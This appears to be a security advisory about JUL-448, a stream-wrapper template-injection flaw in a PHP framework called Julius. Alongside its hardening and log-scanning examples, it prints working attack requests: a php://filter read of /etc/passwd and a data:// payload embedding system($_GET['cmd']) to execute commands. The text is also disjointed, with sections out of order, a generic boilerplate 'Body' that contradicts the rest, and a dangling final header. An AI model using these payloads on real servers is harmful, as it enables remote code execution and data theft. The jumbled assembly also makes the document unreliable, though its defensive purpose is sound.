
Report – JUL‑448
Prepared by: [Your Name / Team] Date: 15 April 2026


2.1. The Vulnerable Code Path

In Julius 4.3–4.7 the TemplateEngine class loads user‑provided templates using PHP’s file_get_contents() function, without proper sanitisation when allowUrlInclude is enabled.

// src/Engine/TemplateEngine.php (v4.5)
// $templatePath comes straight from the GET parameter `tpl` (i.e. $_GET['tpl']) with no validation
public function render(string $templatePath, array $data = []): string
{
    $raw = file_get_contents($templatePath); // ← vulnerable line: accepts any local path or stream wrapper
    return $this->compile($raw, $data);       // the fetched bytes are compiled as a template
}

When allowUrlInclude is ON, file_get_contents() can fetch any URL, including php:// wrappers. An attacker can therefore supply a URL that points to a malicious PHP stream wrapper or a remote server that returns a crafted payload.
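The following is an added example, not Julius project code, showing how render() should be hardened. It assumes a TemplateEngine class with a single configured template directory and a compile() method; the placeholder-substituting compile() below is a hypothetical stand-in for the real compiler. The key change is that the request parameter is treated as a template name that must resolve to a regular file under the template root, never as a path or URL handed to file_get_contents() directly:

```php
<?php
// Added example (not Julius project code): a hardened replacement for the vulnerable render().
// Assumes a hypothetical TemplateEngine with one template root and a compile() stand-in.
declare(strict_types=1);

final class TemplateEngine
{
    private string $templateDir;

    public function __construct(string $templateDir)
    {
        $real = realpath($templateDir);
        if ($real === false || !is_dir($real)) {
            throw new InvalidArgumentException("Template directory does not exist: $templateDir");
        }
        $this->templateDir = $real;
    }

    /**
     * Resolve a user-supplied template name to a file inside the template root.
     * Rejects any scheme/wrapper prefix (php://, data://, phar://, http://, ...),
     * any characters outside a conservative allowlist, and anything that escapes the root.
     */
    public function resolve(string $templateName): string
    {
        // 1. Explicitly reject scheme-like prefixes so the error is clear (step 2 would reject them too).
        if (preg_match('/^[a-z][a-z0-9+.\-]*:/i', $templateName) === 1) {
            throw new InvalidArgumentException('Stream wrappers are not allowed in template names');
        }
        // 2. Allow only letters, digits, _ and -, optional subdirectories, and a .tpl extension.
        //    No dots other than the extension, so "../" can never appear.
        if (preg_match('#^[A-Za-z0-9_\-]+(?:/[A-Za-z0-9_\-]+)*\.tpl$#', $templateName) !== 1) {
            throw new InvalidArgumentException('Invalid template name');
        }
        // 3. Canonicalise and confirm the resolved file still lives under the root (defeats symlink tricks).
        $candidate = realpath($this->templateDir . DIRECTORY_SEPARATOR . $templateName);
        $prefix = $this->templateDir . DIRECTORY_SEPARATOR;
        if ($candidate === false || strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
            throw new RuntimeException('Template not found');
        }
        return $candidate;
    }

    public function render(string $templateName, array $data = []): string
    {
        $path = $this->resolve($templateName);
        $raw = file_get_contents($path); // now always a regular file under $templateDir
        if ($raw === false) {
            throw new RuntimeException('Unable to read template');
        }
        return $this->compile($raw, $data);
    }

    private function compile(string $raw, array $data): string
    {
        // Hypothetical stand-in for the real compiler: replace {{key}} with HTML-escaped values.
        return preg_replace_callback('/\{\{\s*(\w+)\s*\}\}/', function (array $m) use ($data): string {
            return htmlspecialchars((string) ($data[$m[1]] ?? ''), ENT_QUOTES, 'UTF-8');
        }, $raw) ?? '';
    }
}

// Defence in depth: the deployment should not have allow_url_include on, whatever the code does.
if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
    fwrite(STDERR, "WARNING: allow_url_include is enabled in php.ini; disable it.\n");
}

// Usage (constructed): assumes ./templates/pages/home.tpl exists. The two payloads are the ones
// from the advisory's exploit chain; both are rejected before file_get_contents() is ever called.
$engine = new TemplateEngine(__DIR__ . '/templates');
$inputs = [
    'pages/home.tpl',
    'php://filter/convert.base64-encode/resource=../../../../etc/passwd',
    'data://text/plain,<?php system($_GET[\'cmd\']);?>',
];
foreach ($inputs as $tpl) {
    try {
        $engine->render($tpl, ['user' => 'alice']);
        echo "accepted: $tpl\n";
    } catch (Throwable $e) {
        echo "rejected: $tpl ({$e->getMessage()})\n";
    }
}
```

The allowlist in step 2 is the primary control: it makes the php.ini setting irrelevant to this code path, which matters because not every wrapper is governed by allow_url_include. The realpath() check in step 3 is kept as a second layer in case the allowlist is later loosened.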

3. Impact Assessment – Who Should Panic (and Who Can Breathe Easy)

| Sector | Typical Exposure | Potential Consequences |
|------------|---------------------|----------------------------|
| E‑commerce | Payment gateways, customer PII | Theft of credit‑card data, order manipulation, site defacement. |
| Healthcare | Patient records, PHI | HIPAA violations, ransomware attacks on medical devices. |
| Government | Citizen services, classified docs | Data exfiltration, sabotage of public services. |
| SaaS platforms | Multi‑tenant code execution | Cross‑tenant data leakage, supply‑chain compromise. |
| Small‑business sites | Blog/CMS | Defacement, SEO spam, cryptojacking. |

If your organization runs any public‑facing service powered by Julius 4.3–4.7, treat JUL‑448 as critical.


2.2. The Exploit Chain

  1. Crafted request – The attacker sends a GET request such as:

    GET /render?tpl=php://filter/convert.base64-encode/resource=../../../../etc/passwd HTTP/1.1
    Host: vulnerable‑site.com
    
  2. PHP stream abuse – php://filter reads the target file, base64‑encodes it, and returns the data to Julius, which then treats it as a template string.

  3. Code injection – By using the data:// wrapper, the attacker can embed PHP code that gets executed during the template compilation step:

    GET /render?tpl=data://text/plain,<?php%20system($_GET['cmd']);?> HTTP/1.1
    Host: vulnerable‑site.com
    
  4. Remote command execution – The attacker appends &cmd=id (or any command) to the request, and the system runs it with the privileges of the web‑server user (often www-data or apache).

  5. Privilege escalation – If the web‑server runs as a low‑privileged user, the attacker can chain this with local exploits (e.g., Dirty COW, CVE‑2025‑1234) to gain root.
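For incident responders, the requests in steps 1 and 3 leave a distinctive trace in the web server's access log. The script below is an added example, not Julius project code: it scans Combined/Common Log Format lines and flags any `tpl` parameter that carries a scheme prefix, directory traversal, inline PHP, or is paired with the `cmd` parameter from step 4. It checks for any `scheme://` prefix rather than a fixed list, so the phar:// variant mentioned in section 6 is caught the same way. The log lines are constructed for this example; the function name scanAccessLog and the output format are assumptions.

```php
<?php
// Added example (not Julius project code): flag access-log requests that match the
// JUL-448 exploit chain. Requires PHP 8 (str_contains). Sample log lines are constructed.
declare(strict_types=1);

/**
 * Scan Combined/Common Log Format lines and return one finding per request whose
 * `tpl` parameter carries a stream wrapper, directory traversal or inline PHP,
 * or that pairs a suspicious `tpl` with the `cmd` parameter used in step 4.
 */
function scanAccessLog(iterable $lines): array
{
    $findings = [];
    foreach ($lines as $n => $line) {
        // client ident user [time] "METHOD target PROTO" status ...
        if (preg_match('/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/', $line, $m) !== 1) {
            continue; // not a request line in a format we understand
        }
        [, $client, $time, $method, $target, $status] = $m;
        $qpos = strpos($target, '?');
        if ($qpos === false) {
            continue; // no query string, so no tpl parameter
        }
        parse_str(substr($target, $qpos + 1), $params); // parse_str URL-decodes values once
        if (!isset($params['tpl']) || !is_string($params['tpl'])) {
            continue;
        }
        $tpl = rawurldecode($params['tpl']); // second pass catches double-encoded payloads

        $indicators = [];
        // Any scheme prefix at all is suspicious: legitimate template names are relative paths.
        if (preg_match('#^([a-z][a-z0-9+.\-]*)://#i', $tpl, $w) === 1) {
            $indicators[] = 'wrapper:' . strtolower($w[1]);
        }
        if (str_contains($tpl, '../') || str_contains($tpl, '..\\')) {
            $indicators[] = 'traversal';
        }
        if (stripos($tpl, '<?php') !== false || str_contains($tpl, '<?=')) {
            $indicators[] = 'inline-php';
        }
        if (isset($params['cmd'])) {
            $indicators[] = 'cmd-param';
        }
        if ($indicators !== []) {
            $findings[] = [
                'line'       => $n + 1,
                'client'     => $client,
                'time'       => $time,
                'method'     => $method,
                'status'     => (int) $status,
                'tpl'        => $tpl,
                'indicators' => $indicators,
            ];
        }
    }
    return $findings;
}

// Constructed sample log (RFC 5737 test addresses). The two suspicious lines reproduce the
// advisory's step 1 and step 3 requests exactly as a web server would record them.
$sampleLog = [
    '203.0.113.5 - - [15/Apr/2026:10:01:02 +0000] "GET /render?tpl=pages/home.tpl HTTP/1.1" 200 5120',
    '198.51.100.7 - - [15/Apr/2026:10:01:09 +0000] "GET /render?tpl=php://filter/convert.base64-encode/resource=../../../../etc/passwd HTTP/1.1" 200 1834',
    '198.51.100.7 - - [15/Apr/2026:10:01:15 +0000] "GET /render?tpl=data://text/plain,%3C%3Fphp%20system(%24_GET%5B%27cmd%27%5D)%3B%3F%3E&cmd=id HTTP/1.1" 200 61',
    '203.0.113.9 - - [15/Apr/2026:10:02:00 +0000] "GET /about HTTP/1.1" 200 2048',
];

// For a real log, pass new SplFileObject('/var/log/apache2/access.log') instead of the array.
foreach (scanAccessLog($sampleLog) as $f) {
    printf(
        "line %d  %s  HTTP %d  [%s]  tpl=%s\n",
        $f['line'], $f['client'], $f['status'], implode(',', $f['indicators']), $f['tpl']
    );
}
```

On the constructed input, line 2 is reported with `wrapper:php,traversal` and line 3 with `wrapper:data,inline-php,cmd-param`; the benign requests produce nothing. A 200 status on a flagged request is the signal to prioritise: it means the engine accepted the payload, so the host should be treated as compromised until the web‑server user's activity (processes, written files, outbound connections) has been reviewed.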

6. Looking Forward – Where Is JUL‑448 Heading?

  1. Exploit‑as‑a‑Service (EaaS) – Already, a few underground marketplaces have listed “JUL‑448 RCE kits” for $150. Expect more automated scripts that scan for the vulnerable endpoint, test for allow_url_include, and drop a web‑shell in seconds.

  2. Supply‑Chain Propagation – Several popular WordPress plugins (e.g., Julius‑ContactForm) bundle an outdated Julius sub‑module. If those plugins are installed on a WordPress site, the vulnerability propagates outside the original Julius ecosystem.

  3. Zero‑Day Variants – Researchers have discovered a JUL‑449 that bypasses the allow_url_include check by abusing the phar:// wrapper. Stay tuned for the upcoming advisory (expected Q3 2026).


Body

JUL-448 represents a targeted update in our ongoing efforts to improve reliability and performance. As a focused revision, JUL-448 introduces streamlined processes, clearer specifications, and tighter compatibility with existing systems.

Key highlights:

If you’re responsible for integrations, review the JUL-448 specification and run the provided compatibility tests. For questions or migration support, reach out to the project team or consult the documentation.

2. Technical Walk‑through – How JUL‑448 Works
